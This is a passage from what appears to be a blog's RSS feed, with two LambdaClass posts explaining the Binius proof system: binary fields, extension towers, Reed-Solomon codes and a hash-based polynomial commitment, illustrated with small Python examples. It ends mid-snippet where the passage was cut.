&lt;p&gt;If you enjoy interviews with programming language creators, you might also enjoy these previous ones:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Dec 8, 2014 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;indie-languages-interview-pixie-and-timothy-baldridge&#x2F;](&#x2F;indie-languages-interview-pixie-and-timothy-baldridge&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Aug 26, 2015 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types&#x2F;](&#x2F;interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Aug 28, 2015 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;interview-with-nenad-rakocevic-about-red-a-rebol-inspired-programming-language&#x2F;](&#x2F;interview-with-nenad-rakocevic-about-red-a-rebol-inspired-programming-language&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Nov 27, 2015 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;efene-an-erlang-vm-language-that-embraces-the-python-zen&#x2F;](&#x2F;efene-an-erlang-vm-language-that-embraces-the-python-zen&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Dec 28, 2015 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and&#x2F;](&#x2F;interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Dec 29, 2015 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-60901251608c356716f2f92e&#x2F;](&#x2F;interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-60901251608c356716f2f92e&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Feb 29, 2016 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;interview-with-robert-virding-creator-lisp-flavored-erlang-an-alien-technology-masterpiece&#x2F;](&#x2F;interview-with-robert-virding-creator-lisp-flavored-erlang-an-alien-technology-masterpiece&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Feb 12, 2018 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;interview-with-brad-chamberlain-about-chapel-a-productive-parallel-programming-language&#x2F;](&#x2F;interview-with-brad-chamberlain-about-chapel-a-productive-parallel-programming-language&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Apr 1, 2019 [https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler&#x2F;](&#x2F;an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler&#x2F;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;</description>
      </item>
      <item>
          <title>How Binius is helping move the ZK industry forward</title>
          <pubDate>Tue, 12 Dec 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/binius-moving-zk-forward/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/binius-moving-zk-forward/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/binius-moving-zk-forward/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Zero-knowledge and validity proofs, often abbreviated as ZK, represent a fascinating field within the realms of cryptography, mathematics, and computer science. They allow one party, the prover, to convince other parties, termed verifiers, that a specific statement (such as the execution of a computer program) is true in a time- and space-efficient way. This means that the proof can be verified much faster, and with less information, than if the verifiers were to perform the computation directly, and the proof can be constructed so that it does not leak sensitive data.&lt;&#x2F;p&gt;
&lt;p&gt;The consequences of practical zero-knowledge proofs for engineering are many and far-reaching, as we discussed in our previous &lt;a href=&quot;&#x2F;transforming-the-future-with-zero-knowledge-proofs-fully-homomorphic-encryption-and-new-distributed-systems-algorithms&#x2F;&quot;&gt;blog post&lt;&#x2F;a&gt;. One of those areas is crypto (see &lt;a href=&quot;&#x2F;lambda-crypto-doctrine&#x2F;&quot;&gt;our crypto doctrine&lt;&#x2F;a&gt;). Still, it extends to content creation platforms, identity and authentication, national security, distributed computing, etc.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;current-developments-in-zk&quot;&gt;Current developments in ZK&lt;&#x2F;h2&gt;
&lt;p&gt;To prove the execution of arbitrary computer programs, we need to transform them into a form amenable to ZK; this process is called arithmetization and consists of expressing the program as a system of equations defined over integers&#x2F;finite fields. This differs from how we normally express and reason about computer programs, in terms of bytes and binary operations. For example, if our program has a boolean variable, we must ensure that the variable takes only the values 0 or 1. Since we work over finite fields, this condition adds an equation of the form $b(1 - b) = 0$. The problem is that this boolean is now represented by a large field element (at least 64 bits long), which adds significant overhead in memory use and computational time, since we work with field operations rather than bit operations. Bitwise operations, or proving the binary decomposition of an integer, become costly.&lt;&#x2F;p&gt;
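&lt;p&gt;As a toy illustration of the booleanity constraint above (our own Python sketch, not tied to any particular proof system; the prime $97$ is an arbitrary small choice), we can check that $b(1 - b) = 0$ holds over a prime field exactly when $b$ is $0$ or $1$:&lt;&#x2F;p&gt;

```python
# Toy sketch: the booleanity constraint b*(1 - b) = 0 over a prime field.
# The prime p = 97 is an arbitrary small choice for illustration; real
# systems use much larger fields (e.g. 64-bit Goldilocks).
p = 97

def satisfies_booleanity(b):
    # Holds exactly when b equals 0 or 1 as a field element.
    return (b * (1 - b)) % p == 0

assert satisfies_booleanity(0)
assert satisfies_booleanity(1)
assert not satisfies_booleanity(2)  # any other field element violates it
```

&lt;p&gt;Any assignment outside $\{ 0, 1 \}$ fails the equation, which is why adding it to the system forces the variable to be boolean.&lt;&#x2F;p&gt;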
&lt;p&gt;Since performance in ZK involves different tradeoffs than ordinary programming, developers need to have a deeper understanding of cryptography and learn to code differently. The tooling for developers is still being created and depends, in some cases, on writing arithmetic circuits directly, which is time-consuming and prone to bugs. Besides, proving adds significant overhead, both in memory and time use. Therefore, ZK introduces difficulties both in developer and user experiences. It means more time and money spent on training developers and lower availability of skilled programmers.&lt;&#x2F;p&gt;
&lt;p&gt;Over the last few years, the ZK space has advanced very quickly, and we have seen efforts in various directions to increase the performance of proof systems:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. STARKs using small field sizes, such as mini-Goldilocks and the 31-bit Mersenne prime.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Folding schemes, such as Nova, Protostar, and Protogalaxy.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Lookup arguments, with Jolt aiming to reduce everything to just looking up any operation over a pre-computed table of valid input&#x2F;output pairs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Each system has advantages and disadvantages regarding proof size, prover time, verifier time, and the type of computations that can be easily supported. There have been efforts on the hardware side to accelerate these proof systems, but they all pay the price for representing bits in terms of field elements.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;binius-and-the-use-of-binary-fields&quot;&gt;Binius and the use of binary fields&lt;&#x2F;h2&gt;
&lt;p&gt;Using smaller fields in STARKs reduced the overhead in representing variables and led to lower proving times. The question arises naturally: can we do better than this? Near the end of the year, Ulvetanna released a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1784.pdf&quot;&gt;paper&lt;&#x2F;a&gt; showing that we can work over smaller fields and open-sourced an implementation, Binius. A first analysis of Binius can be found &lt;a href=&quot;&#x2F;snarks-on-binary-fields-binius&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;. We will release the second part of the post soon, diving deeper into the construction and its uses.&lt;&#x2F;p&gt;
&lt;p&gt;Binius’s contributions can be summarized in three main points:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Working with binary fields - this is essentially working with bitstrings of various sizes. It is possible to adjust the size to represent variables with no overhead.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. A commitment scheme for small fields. It is based on hash functions, which are faster than those based on elliptic curves and do not need a trusted setup. It draws heavily on [Brakedown](https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;1043.pdf).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. A SNARK built on top of 1 and 2, based on the ideas of HyperPlonk, but which could be extended to other arithmetization schemes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The main advantage of the whole construction is that it handles bit operations more naturally (for example, the exclusive OR between two bitstrings is just addition over the field) and eliminates the overhead associated with the representation of data types. For instance, boolean variables can be represented by just one field element of size 1 bit! This reduces the memory footprint of the whole proof system (though we will need to work with larger fields to achieve cryptographic security).&lt;&#x2F;p&gt;
&lt;p&gt;Another advantage is that operations are really fast and hardware-friendly. In the case of adding field elements, it is just the XOR operation, avoiding carry and overflow. There are also very efficient algorithms to work with binary fields, such as an additive Fast Fourier Transform (FFT), which is used to produce the Reed-Solomon encoding.&lt;&#x2F;p&gt;
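&lt;p&gt;To make the “addition is XOR” point concrete, here is a minimal Python sketch (our own example, independent of any Binius code), treating elements of $\mathbb{F_{ 2^4 }}$ as 4-bit strings:&lt;&#x2F;p&gt;

```python
# Sketch: adding two binary-field elements (viewed as bitstrings) is
# bitwise XOR, so there are no carries and no overflow.
a = 0b1011  # an element of F_{2^4} as a 4-bit string
b = 0b0110

s = a ^ b                 # field addition
assert s == 0b1101
assert a ^ a == 0         # characteristic two: x + x = 0
assert (a ^ b) ^ b == a   # addition and subtraction coincide
```

&lt;p&gt;Since every element is its own additive inverse, subtraction is also XOR; this is part of what makes binary fields hardware-friendly.&lt;&#x2F;p&gt;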
&lt;p&gt;The main drawbacks are related to proof size (it is significantly larger than that of most SNARKs and STARKs, on the order of a few MB) and verifier time. However, the verifier’s time is still on par with most proof systems, and the prover is significantly faster. Besides, smaller proof sizes in SNARKs come at the cost of a trusted setup, which makes the whole system rely on the integrity of a parameter initialization ceremony, generally using several GB of memory.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;applications&quot;&gt;Applications&lt;&#x2F;h2&gt;
&lt;p&gt;The original paper shows how to arithmetize the Keccak and Grøstl hash functions, which involve many bitwise operations, making them hard to handle with other proof systems. The performance analysis offers an idea of the capabilities of the new construction and what we can gain by adopting it. The ability to handle bitwise operations more naturally also allows us to use these hash functions for commitments and prove them easily.&lt;&#x2F;p&gt;
&lt;p&gt;We could build a virtual machine and prove the correctness of its execution using Binius. This could make proving general computer programs very efficient, at least in terms of the time needed to generate the proof. We could solve the problem of proof size by wrapping the proofs with a SNARK&#x2F;STARK, which will only need to verify Binius’s proofs, leading to more lightweight and efficient constructions.&lt;&#x2F;p&gt;
&lt;p&gt;Reducing the prover’s memory and time use can enable provable fully homomorphic encryption (FHE), which lets users delegate expensive computations to untrusted servers without compromising the data. FHE allows users to compute over encrypted data without decrypting it first.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;&#x2F;h2&gt;
&lt;p&gt;We think that Binius can be a game changer when it comes to scaling provable computations, which can spark significant changes in different areas of software engineering and finance. The reduction in memory use, the hardware friendliness of the operations, and the development of a virtual machine could make provable computations on consumer hardware a reality while enhancing the developer experience and reducing the resources and training needed. We are one step closer to the mass adoption of ZK technology. LambdaClass is interested in this new proof system and its capabilities, and we would like to start implementing and developing it in 2024.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>SNARKs on binary fields: Binius - Part 1</title>
          <pubDate>Fri, 01 Dec 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/snarks-on-binary-fields-binius/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/snarks-on-binary-fields-binius/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/snarks-on-binary-fields-binius/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;ZK-SNARKs (zero-knowledge, succinct, non-interactive arguments of knowledge) and STARKs (scalable, transparent arguments of knowledge) have gained widespread attention due to their applications in distributed private computing and blockchain scaling. Over the years, we have seen several performance improvements thanks to new proof systems, new lookup arguments, and smaller fields. One of the biggest challenges is related to the arithmetization of programs, that is, the transformation of a given program into a system of polynomial relations. This represents a considerable overhead, as we have to represent variables, such as bits, by elements in a finite field. In the case of SNARKs over elliptic curves, the field is given by the elliptic curve used, which means that to represent simple bit operations, we have to use (at least) 256-bit field elements. In the case of STARKs, we can use smaller fields (such as mini-Goldilocks or Mersenne 31), which gives a smaller overhead, but then we have to work over extension fields to achieve cryptographic security. Typical hash functions involve lots of bitwise operations, which makes their arithmetization, and therefore proving anything that involves computing hashes, costly. This has led to the use of SNARK-friendly hashes such as Poseidon or Tip5.&lt;&#x2F;p&gt;
&lt;p&gt;A recent &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1784.pdf&quot;&gt;line of work by Ulvetanna&lt;&#x2F;a&gt; proposes using binary fields with the brakedown polynomial commitment scheme to obtain a new SNARK, which can represent bitwise operations more naturally. It also has the advantage that it is hardware-friendly and has a lower memory footprint. This post will explain some key concepts, such as binary fields and the brakedown commitment scheme. We will use these concepts later to understand the working principle of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gitlab.com&#x2F;UlvetannaOSS&#x2F;binius&#x2F;-&#x2F;tree&#x2F;main&#x2F;src?ref_type=heads&quot;&gt;Binius&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;binary-fields&quot;&gt;Binary fields&lt;&#x2F;h2&gt;
&lt;p&gt;Binary fields are fields of characteristic two. They are of the form $\mathbb{F_{ 2^n }}$ for some $n$. The simplest binary field is $\mathbb{F_2}$ whose elements are just $\{ 0, 1 \}$ with the operations done modulo $2$. Addition corresponds to bitwise exclusive OR, and multiplication corresponds to bitwise AND. Given that the integers modulo $2^n$ do not form a field for $n \geq 2$, we need to do some work to construct a field with $2^n$ elements. First, we are going to consider the polynomials over $\mathbb{F_2}$, that is, polynomials whose coefficients are either $0$ or $1$, such as $p(x) = x^7 + x^5 + x^2 + 1$. Then, we select an irreducible polynomial $m(x)$ over $\mathbb{F_2}$ and consider the equivalence classes by taking the remainder of any polynomial by $m(x)$. For example, the polynomial $m(x) = x^2 + x + 1$ is irreducible; the remainder is always a polynomial of degree at most one, $r(x) = a x + b$, where $a$ and $b$ are each either zero or one. The resulting field is $\mathbb{F_{ 2^2 }}$, which contains $4$ elements, $0 + 0x$, $1 + 0x$, $0 + x$, $1 + 1x$, which we can represent as $00$, $10$, $01$ and $11$. We can always unambiguously represent an element in $\mathbb{F_{ 2^n }}$ by a bitstring of length $n$. A list of irreducible polynomials over $\mathbb{F_2}$ can be found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.hpl.hp.com&#x2F;techreports&#x2F;98&#x2F;HPL-98-135.pdf&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
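&lt;p&gt;As a toy example of our own, multiplication in $\mathbb{F_{ 2^2 }}$ can be sketched in Python by multiplying the polynomials $a_0 + a_1 x$ and reducing with $x^2 = x + 1$, which follows from $m(x) = x^2 + x + 1$:&lt;&#x2F;p&gt;

```python
# Sketch: multiplication in F_{2^2} = F_2[x] / (x^2 + x + 1).
# An element a0 + a1*x is the pair (a0, a1); coefficients live in F_2.
def mul_f4(a, b):
    a0, a1 = a
    b0, b1 = b
    # Multiply the polynomials, then reduce using x^2 = x + 1 (mod 2).
    c0 = (a0 * b0 + a1 * b1) % 2
    c1 = (a0 * b1 + a1 * b0 + a1 * b1) % 2
    return (c0, c1)

# x * x = x + 1, i.e. "01" * "01" = "11"
assert mul_f4((0, 1), (0, 1)) == (1, 1)
# x * (x + 1) = x^2 + x = 1, so x and x + 1 are inverses
assert mul_f4((0, 1), (1, 1)) == (1, 0)
```

&lt;p&gt;For example, $x \cdot (x + 1) = x^2 + x = 1$, so $x$ and $x + 1$ are multiplicative inverses of each other.&lt;&#x2F;p&gt;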
&lt;p&gt;The polynomial $m(x) = x^3 + x + 1$ is also irreducible, so we can use it to build a different extension, $\mathbb{F_{ 2^3 }}$, containing $8$ elements. A different approach to constructing extensions of $\mathbb{F_2}$ is using extension towers. Binius uses the construction proposed by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.fq.math.ca&#x2F;Scanned&#x2F;26-4&#x2F;wiedemann.pdf&quot;&gt;Wiedemann&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We can use the multilinear Lagrange polynomials as a basis for the tower of extensions. This has the advantage that embedding one extension into the others is achieved trivially by padding with zero coefficients. The construction proceeds inductively:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Start from $\tau_0 = \mathbb{F_2}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Set $\tau_1 = \mathbb{F_2} [ x_0 ] &#x2F; (x_0^2 + x_0 + 1)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Continue $\tau_k = \tau_{ k - 1 } [ x_{ k - 1} ] &#x2F; ( x_{ k - 1 }^2 + x_{ k - 1} x_{ k - 2} + 1)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We have $\tau_0 \subset \tau_1 \subset \tau_2 \subset \dots \subset \tau_m$.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s take a look at the elements to see how this works:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. For $\tau_0$ this is straightforward, since we have either $0$ or $1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. For $\tau_1$, the elements are $0 + 0x_0$, $1 + 0x_0$, $0 + 1x_0$, $1 + 1x_0$. We can identify the elements of $\tau_0$ with the first two, $00$ and $10$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. For $\tau_2$, we have $0 + 0 x_0 + 0 x_1 + 0 x_0 x_1$, $1 + 0 x_0 + 0 x_1 + 0 x_0 x_1$, $0 + 1 x_0 + 0 x_1 + 0 x_0 x_1$, $1 + 1 x_0 + 0 x_1 + 0 x_0 x_1$, $1 + 0 x_0 + 1 x_1 + 0 x_0 x_1$, $0 + 1 x_0 + 1 x_1 + 0 x_0 x_1$, $1 + 1 x_0 + 1 x_1 + 0 x_0 x_1$, etc., which we identify with all bitstrings of size $4$. The elements of $\tau_1$ can be seen as the elements in $\tau_2$ of the form $b_0 b_1 00$. This way of sorting the elements corresponds to lexicographic ordering.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;It’s also worth noting that given an element $b_0 b_1 b_2 … b_{ 2^k - 1}$ from $\tau_k$, we can break it into halves and write it as $b_{lo} + x_{ k - 1 } b_{hi}$, where $b_{hi}$ and $b_{lo}$ are from $\tau_{ k - 1}$. The addition is just XOR, which has several advantages from the hardware point of view, including the fact that we don’t need to worry about carries. Multiplication can be carried out in a recursive fashion using the decomposition we saw. If we have $a_{hi} x_k + a_{lo}$ and $b_{hi} x_k + b_{lo}$ we get&lt;br &#x2F;&gt;
$a_{hi} b_{hi} x_k^2 + (a_{hi} b_{lo} + a_{lo} b_{hi}) x_k + a_{lo} b_{lo}$&lt;br &#x2F;&gt;
But we know that $x_k^2 = x_{k-1} x_k + 1$. We then have to compute products in $\tau_{ k - 1}$, where we can apply the same strategy until we can solve them either because it’s a trivial operation (operation over $\mathbb{F_2}$) or because we have a lookup table to get the values. There are also efficient multiplication techniques to multiply elements from a field by an element in a subfield. For example, an element from $\tau_{ k + j}$ can be multiplied by an element of $\tau_k$ in just $2^j$ multiplications.&lt;&#x2F;p&gt;
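The recursive multiplication just described can be sketched as follows. This is an illustrative snippet of our own (with the Karatsuba trick for the cross term); an element of $\tau_k$ is an integer of $2^k$ bits whose low and high halves are $b_{lo}$ and $b_{hi}$:

```python
# Recursive multiplication in the Wiedemann tower. An element of tau_k
# is stored as an integer of 2^k bits, representing b_lo + x_{k-1} b_hi.
def tower_mul(a, b, k):
    if k == 0:
        return a & b  # multiplication in F_2 is AND
    half = 1 << (k - 1)              # number of bits in each half
    mask = (1 << half) - 1
    a_lo, a_hi = a & mask, a >> half
    b_lo, b_hi = b & mask, b >> half
    lo_lo = tower_mul(a_lo, b_lo, k - 1)
    hi_hi = tower_mul(a_hi, b_hi, k - 1)
    # Karatsuba: a_hi b_lo + a_lo b_hi from a single extra product
    cross = tower_mul(a_lo ^ a_hi, b_lo ^ b_hi, k - 1) ^ lo_lo ^ hi_hi
    # reduce using x_{k-1}^2 = x_{k-2} x_{k-1} + 1  (x_0^2 = x_0 + 1 when k = 1)
    x_prev = 1 << (half >> 1) if k >= 2 else 1
    hi = cross ^ tower_mul(hi_hi, x_prev, k - 1)
    lo = lo_lo ^ hi_hi
    return (hi << half) | lo
```

For example, `tower_mul(2, 2, 1) == 3` encodes $x_0^2 = x_0 + 1$, and embedding by zero padding is preserved: multiplying two $\tau_1$ elements inside $\tau_2$ gives the same result.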
&lt;h2 id=&quot;coding-theory&quot;&gt;Coding Theory&lt;&#x2F;h2&gt;
&lt;p&gt;A code of block length $n$ over an alphabet $A$ is a subset of $A^n$, that is, a set of vectors with $n$ components belonging to $A$. The Hamming distance between two codewords is the number of components in which they differ.&lt;&#x2F;p&gt;
&lt;p&gt;An $[n, k, d]$ code over a field $\mathbb{F}$ is a $k$-dimensional linear subspace of $\mathbb{F}^n$ such that the distance between two different elements is at least $d$. Reed-Solomon codes are examples of these types of codes. Given a vector of size $k$, $(a_0, a_1, … , a_{ k - 1})$, its Reed-Solomon encoding consists in interpreting the entries as defining a polynomial of degree at most $k - 1$ (for example, as its coefficients) and then evaluating this polynomial over $n$ points (we used this encoding when working with STARKs). The code is called systematic if the first $k$ elements of the codeword correspond to the original vector. The ratio $\rho = k &#x2F; n$ is the rate of the code (we worked with its inverse, the blow-up factor). In this case, the distance is $n - k + 1$ since two distinct polynomials of degree $k - 1$ can coincide in at most $k - 1$ points.&lt;&#x2F;p&gt;
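As a toy illustration of these parameters (field and sizes chosen here, not taken from the post), we can encode over a small prime field and check the distance bound:

```python
# Toy Reed-Solomon encoder over the prime field F_97: k = 3 message
# symbols, n = 8 evaluation points, so the rate is 3/8.
P = 97

def rs_encode(msg, n):
    """Interpret `msg` as the coefficients of a degree < len(msg)
    polynomial and evaluate it at the points 0, 1, ..., n - 1."""
    def eval_poly(x):
        acc = 0
        for c in reversed(msg):  # Horner's rule
            acc = (acc * x + c) % P
        return acc
    return [eval_poly(x) for x in range(n)]

cw1 = rs_encode([3, 1, 4], 8)
cw2 = rs_encode([3, 1, 5], 8)
# distinct polynomials of degree <= 2 agree on at most 2 points, so the
# codewords differ in at least n - k + 1 = 6 positions
disagreements = sum(a != b for a, b in zip(cw1, cw2))
```

Here the two messages differ only in the $x^2$ coefficient, so the difference polynomial vanishes only at $x = 0$ and the codewords disagree in $7 \geq 6$ positions.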
&lt;p&gt;The $m$-fold interleaved code of a code of block length $n$ can be seen as a code of length $n$ over the alphabet $A^m$: we stack $m$ codewords as rows and read the columns as elements of $A^m$.&lt;&#x2F;p&gt;
&lt;p&gt;Given a $[n,k,d]$ linear code $C$ over $\mathbb{F}$ with generating matrix $M$ and a vector space $V$ over $\mathbb{F}$, the extension code $C^\prime$ of $C$ is the image of the mapping $M x$, where $x$ is in $V^k$.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;polynomial-commitment-scheme&quot;&gt;Polynomial Commitment Scheme&lt;&#x2F;h2&gt;
&lt;p&gt;The field $\mathbb{F}$ containing the polynomial’s coefficients and the code’s alphabet can be as small as needed, but it should be the same for both. Security can be added by sampling challenge elements from an extension field $\mathbb{E}$.&lt;&#x2F;p&gt;
&lt;p&gt;The prover starts with a vector $(t_0, t_1, … , t_{ n - 1 })$, which he interprets as the coefficients in the Lagrange basis over $\{ 0 , 1 \}^{\log n}$. Then, he organizes the coefficients in an $m_0 \times m_1$ matrix $T$, with rows $\mathrm{row_i}$, and encodes each $\mathrm{row_i}$ to obtain $u_i$ (there are $m_0$ rows of length $\rho^{ - 1 } m_1$). We call $U$ the matrix containing the $u_i$ as rows. The prover builds a Merkle tree using each column as a leaf and outputs the root as the commitment.&lt;&#x2F;p&gt;
&lt;p&gt;The verifier selects an evaluation point $r = (r_0, r_1 , \dots, r_{ \log (n) - 1})$, and the prover will provide $s$ as the evaluation of the polynomial over $r$. To generate the evaluation proof,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The prover sends the vector-matrix product $R.T$, where $R$ is the tensor product of the last $\log (m_0 )$ components of $r$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The verifier samples $i$ queries (the number depends on the security level), each selecting one column of $U$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The prover sends the requested columns and their corresponding authentication paths.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The proof consists of the evaluation, $s$, the Merkle root, $\mathrm{root}$, the vector-matrix product $R.T$, the $i$ columns, and their corresponding authentication paths.&lt;&#x2F;p&gt;
&lt;p&gt;To check the proof:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The verifier checks that the Merkle tree contains the columns.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The verifier computes the encoding of $R.T$ and checks that, at each queried position, the product of the selected column of $U$ by $R$ corresponds to the entry of the encoding of $R.T$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The verifier checks that $s$ is the proper evaluation using $R.T$ and the tensor product of the first $\log (m_1)$ components of $r$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
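The tensor structure behind this check can be verified on toy values (illustrative field and sizes of our choosing, ignoring the encoding and Merkle layers): evaluating the multilinear polynomial at $r$ equals first forming $R.T$ with the tensor product of the last $\log(m_0)$ components of $r$, and then dotting with the tensor product of the first $\log(m_1)$ components.

```python
# Toy check of the tensor-product evaluation (field F_97, 4 variables):
# the coefficients t in the multilinear Lagrange basis over {0,1}^4 are
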